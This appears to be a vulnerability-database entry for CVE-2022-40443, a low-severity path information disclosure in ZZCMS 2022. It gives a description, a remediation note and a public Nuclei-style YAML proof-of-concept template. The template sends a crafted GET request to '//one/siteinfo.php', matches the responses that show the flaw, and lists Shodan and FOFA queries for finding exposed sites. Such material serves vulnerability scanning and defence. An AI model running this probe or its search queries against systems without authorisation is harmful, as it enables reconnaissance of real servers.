CVE-2022-40443: ZZCMS 2022 - Path Information Disclosure

日期: 2025-08-01 | 影响软件: ZZCMS | POC: 已公开

漏洞描述

An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.

PoC代码[已公开]

id: CVE-2022-40443

info:
  name: ZZCMS 2022 - Path Information Disclosure
  author: ritikchaddha
  severity: low
  description: |
    An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.
  impact: |
    An attacker can gain sensitive information about the server's file system.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/liong007/ZZCMS/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40443
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-40443
    cwe-id: CWE-22
    epss-score: 0.28915
    epss-percentile: 0.9641
    cpe: cpe:2.3:a:zzcms:zzcms:2022:*:*:*:*:*:*:*
  metadata:
    vendor: zzcms
    product: zzcms
    shodan-query: html:"zzcms"
    fofa-query: body="zzcms"
  tags: cve,cve22,zzcms,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}//one/siteinfo.php"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'class="titlebig'
          - 'zzcms'
          - 'siteinfo[-_]\d+\.html?'
        condition: and

      - type: word
        part: body
        words:
          - '暂无信息'
        negative: true
# digest: 490a004630440220621a87876786b2f066a1b998026af61996856a8a76c334bac5e857dbbc7ed4e102206ff6d7368e7bcf12b1ea8fa4c33c85b2029aa0100c4ba54798b3b664a389fc1b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐